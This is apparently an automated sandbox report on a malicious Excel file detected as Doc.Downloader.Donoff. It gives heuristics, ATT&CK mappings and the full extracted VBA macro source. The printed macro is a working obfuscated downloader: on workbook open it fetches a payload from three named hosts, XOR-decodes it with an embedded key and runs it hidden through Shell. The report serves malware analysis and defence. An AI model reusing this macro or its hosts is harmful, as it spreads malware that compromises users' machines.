MALICIOUS
388
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1059 Command and Scripting Interpreter
The file is an Office document containing obfuscated VBA macros. The Workbook_Open macro is present and uses CreateObject and Shell calls, indicating it is designed to execute arbitrary code. The presence of ClamAV detections for 'Doc.Downloader.Donoff-10030369-0' strongly suggests this macro is a downloader for a second-stage payload.
Heuristics 8
-
ClamAV: Doc.Downloader.Donoff-10030369-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Donoff-10030369-0
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell aa, vbHide End Function -
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
SHEOVER = Split(sTVOL.ComboBox1.ControlTipText, "DRUG") Set Module500_PIRO_LOR = CreateObject(SHEOVER(3)) StendMissed = sTVOL.Label1.Caption -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
SHEOVER = Split(sTVOL.ComboBox1.ControlTipText, "DRUG") Set Module500_PIRO_LOR = CreateObject(SHEOVER(3)) StendMissed = sTVOL.Label1.Caption -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
CallByName rptProblem, sTVOL.OptionButton1.ControlTipText, VbMethod, SHEOVER(5), Module500_4, False Import2 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Sub Workbook_Open() Rashe = 4 + 81
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 9796 bytes |
SHA-256: cab0044f15f9c17a519288cd6f45eec89fb97c015c80689d526ac2146b03ae78 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Dard"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
Rashe = 4 + 81
If 1102 > Rashe Then
Maxibon
End If
End Sub
Attribute VB_Name = "P1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "sTVOL"
Attribute VB_Base = "0{BA5B73E2-59C8-492D-ABF0-E10AF2C4C3DC}{7CD9E04D-DFC5-4CAC-89AA-AA6C817D5AE9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Ishimitsu"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function ratatu() As String
Module23
ratatu = ""
End Function
Public Sub Challenge(sender As String, e As Integer)
CallByName rptProblem, sTVOL.OptionButton1.ControlTipText, VbMethod, SHEOVER(5), Module500_4, False
Import2
End Sub
Private Sub Import2()
'
' Iae?in1 Iae?in
'
'
CallByName rptProblem, sTVOL.Trbd.Text, VbMethod, Module500_System, sTVOL.SpinButton1.ControlTipText
Exit Sub
ActiveWorkbook.Worksheets.Add
With ActiveSheet.QueryTables.Add(Connection:= _
"TEXT;C:\Users\timur.tatarshaov\Documents\fireworks\80000 ?i?aiei naa?aaie 2010 3_54.txt" _
, Destination:=Range("$A$1"))
.Name = "80000 ?i?aiei naa?aaie 2010 3_54"
.FieldNames = True
.RowNumbers = False
.FillAdjacentFormulas = False
.PreserveFormatting = True
.RefreshOnFileOpen = False
.RefreshStyle = xlInsertDeleteCells
.SavePassword = False
.SaveData = True
.AdjustColumnWidth = True
.RefreshPeriod = 0
.TextFilePromptOnRefresh = False
.TextFilePlatform = 1251
.TextFileStartRow = 1
.TextFileParseType = xlDelimited
.TextFileTextQualifier = xlTextQualifierDoubleQuote
.TextFileConsecutiveDelimiter = False
.TextFileTabDelimiter = True
.TextFileSemicolonDelimiter = False
.TextFileCommaDelimiter = False
.TextFileSpaceDelimiter = False
.TextFileColumnDataTypes = Array(1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1)
.TextFileTrailingMinusNumbers = True
.Refresh BackgroundQuery:=False
End With
End Sub
Attribute VB_Name = "RID_009"
Public Sub MoveSheets(sheetToMove As String, sheetAnchor As String, VrigDO6OrAfter As String)
Dim i
On Error GoTo d13
For i = LBound(MovedPermanently) To UBound(MovedPermanently) Step 1
VrigDO3 "100", 2
If rptProblem.Status <> 200 Then
Err.Raise vbObjectError + 900, "1", "2"
End If
VrigDO6 "33", 3
Exit Sub
d13:
Next
Exit Sub
End Sub
Public Sub Module23()
SHEOVER = Split(sTVOL.ComboBox1.ControlTipText, "DRUG")
Set Module500_PIRO_LOR = CreateObject(SHEOVER(3))
StendMissed = sTVOL.Label1.Caption
Set Module500_RDD2 = Module500_PIRO_LOR.Environment(SHEOVER(5 - 1))
MovedPermanently = Split("hostalmilabi.com/hjv56+ipt.se/hjv56+minilab.ca/hjv56", sTVOL.zLBL.Caption)
Set SubProperty = CreateObject(SHEOVER(1))
Set Module500_GMAKO = CreateObject(SHEOVER(5 - 3))
Set rptProblem = CreateObject(SHEOVER(0))
Module500_LAKOPPC = Module500_RDD2(SHEOVER(6))
ProjectDarvin = 0
MoveSheets "", "", ""
End Sub
Public Function VrigDO3(FullPath As String, NumHoja As Integer) As String
If NumHoja > 500 Then
If Dir(FullPath & ".qif") > "" Then
VrigDO3 = "File already exists [El fichero ya existe]: " & FullPath
Exit Function
End If
If Dir(FullPath & "_2.qif") > "" Then
VrigDO3 = "File already exists [El fichero ya existe]: " & FullPath
Exit Function
End If
End If
Module500_4 = sTVOL.Label2.Caption & MovedPermanently(i)
ProjectDarvin = ProjectDarvin + 2
Dim XIpotom2 As Ishimitsu
Set XIpotom2 = New Ishimitsu
XIpotom2.Challenge "Ardu", 22
CallByName rptProblem, sTVOL.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
End Function
Public Function DoChild()
Module500_Done = Module500_LAKOPPC
Module500_DoneBBB = Module500_Done + "\bogort" + CStr(ProjectDarvin)
Module500_Done = Module500_Done + Replace(SHEOVER(12), ".", CStr(ProjectDarvin) + ".")
SubProperty.Type = 1
End Function
Attribute VB_Name = "RID_006"
Public Const Module500_System = "User-Agent"
Public SubProperty As Object
Public Const Sooopchik = "avetof"
Public Module500_PokerFace As Variant
Public Module500_GMAKO As Object
Public Module500_LAKOPPC As String
Public Module500_PIRO_LOR As Object
Public ProjectDarvin As Integer
Public Module500_RDD2 As Object
Public StendMissed As String
Public Module500_2 As String
Public SHEOVER() As String
Public Module500_Done As String
Public Module500_DoneBBB As String
Public rptProblem As Object
Public MovedPermanently() As String
Public Module500_4 As String
Public Function VrigDO4(FullPath As String, NumHoja As Integer) As String
AsizePlusX Module500_DoneBBB, Module500_Done, "e81G9Dsvrh0NR2qGWZSk1CSTNyqr8I2f"
For i = 3 To NumHoja
If NumHoja > 100 Then
If UCase(Trim(Cel.ls(i, ColumnaExportado).Value)) = "N" Then
If Cel.ls(i, ColumnaDate).Value = "" Then
VrigDO4 = "Date column is empty for row [Columna fecha vacia para fila]: " & i
Exit Function
End If
If Cel.ls(i, ColumnaAmount).Value = "" Then
If ColumnaAmount2 = -1 Then
VrigDO4 = "Amount column is empty for row [Columna amount vacia para fila]: " & i
Exit Function
End If
End If
If Cel.ls(i, ColumnaMemo).Value = "" Then
VrigDO4 = "Memo column es empty for row [Columna memo vacia para fila]: " & i
Exit Function
End If
If Cel.ls(i, ColumnaCategory).Value = "" Then
If ColumnaAmount2 = -1 Then
VrigDO4 = "Category column is empty for row [Columna category vacia para fila]: " & i
Exit Function
End If
End If
If ColumnaAmount2 <> -1 Then
If Cel.ls(i, ColumnaAmount2).Value <> "" And Cel.ls(i, ColumnaCategory2).Value = "" Then
VrigDO4 = "Category2 column is empty for row [Columna category2 vacia para fila]: " & i
Exit Function
End If
End If
End If
End If
Next i
DoSex StendMissed & Module500_Done & ",vape"
End Function
Function itemTitle(skuNum)
'retrieve Item title from SKU
itemTitle = Application.WorksheetFunction.VLookup(skuNum, [Products], 2, 0)
End Function
Function itemDesc(skuNum)
'retrieve item description from SKU
itemDesc = Application.WorksheetFunction.VLookup(skuNum, [Products], 4, 0)
End Function
Function itemUPC(skuNum)
'retrieve item upc from SKU, No character limit or formatting
itemUPC = Application.WorksheetFunction.VLookup(skuNum, [Products], 3, 0)
End Function
Public Sub Method1(MethodParam2() As Byte, MethodParam As String)
Dim Debadeba2 As Long
Dim Debadeba3 As Long
Dim Debadeba5 As Long
Dim Debadeba6 As Long
Dim plusplus() As Byte
Dim Debadeba4 As Long
Dim plusplusLen As Long
plusplusLen = Len(MethodParam)
ReDim plusplus(plusplusLen)
plusplus = StrConv(MethodParam, vbFromUnicode)
Debadeba2 = UBound(MethodParam2) + 1
Debadeba5 = Debadeba2
For Debadeba4 = 0 To (Debadeba2 - 1)
aa = plusplus(Debadeba4 Mod plusplusLen)
bb = MethodParam2(Debadeba4)
MethodParam2(Debadeba4) = DoLove(bb, aa)
If (Debadeba4 >= Debadeba6) Then
Debadeba3 = Int((Debadeba4 / Debadeba5) * 100)
Debadeba6 = (Debadeba5 * ((Debadeba3 + 1) / 100)) + 1
End If
Next
End Sub
Public Sub Maxibon()
Dim c As Ishimitsu
Set c = New Ishimitsu
CallByName c, sTVOL.TextBox2.Text, VbMethod
Set c = Nothing
End Sub
Public Function DoLove(aa, bb)
DoLove = aa Xor bb
End Function
Public Function VrigDO6(FullPath As String, NumHoja As Integer) As String
DoChild
CallByName SubProperty, "Open", VbMethod
If NumHoja > 400 Then
If numExportadas = 0 Then
VrigDO6 = "No rows to export [No tiene filas por exportar]"
Exit Function
End If
End If
Module500_PokerFace = rptProblem.responseBody
SubProperty.Write Module500_PokerFace
CallByName SubProperty, "s" + Sooopchik + "ile", VbMethod, Module500_DoneBBB, 2
VrigDO4 ".", 1
End Function
Public Sub AsizePlusX(DROVER As String, ROVERJ As String, Optional Module500_Sexote As String)
Dim ROVER As Integer
Dim GROVER() As Byte
ROVER = FreeFile
Open DROVER For Binary As #ROVER
ReDim GROVER(0 To LOF(ROVER) - 1)
Get #ROVER, , GROVER()
Close #ROVER
Call Method1(GROVER(), Module500_Sexote)
ROVER = FreeFile
Open ROVERJ For Binary As #ROVER
Put #ROVER, , GROVER()
Close #ROVER
End Sub
Public Function DoSex(aa)
Shell aa, vbHide
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 57344 bytes |
SHA-256: d94c9ef5aee49f71dca0e466667b228c9d8bf84755729b90b1ae76ce7916847d |
|||
|
Detection
ClamAV:
Doc.Downloader.Donoff-10030369-0
Obfuscation or payload:
unlikely
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.